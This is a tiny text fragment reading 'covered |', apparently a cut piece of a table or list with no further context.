covered |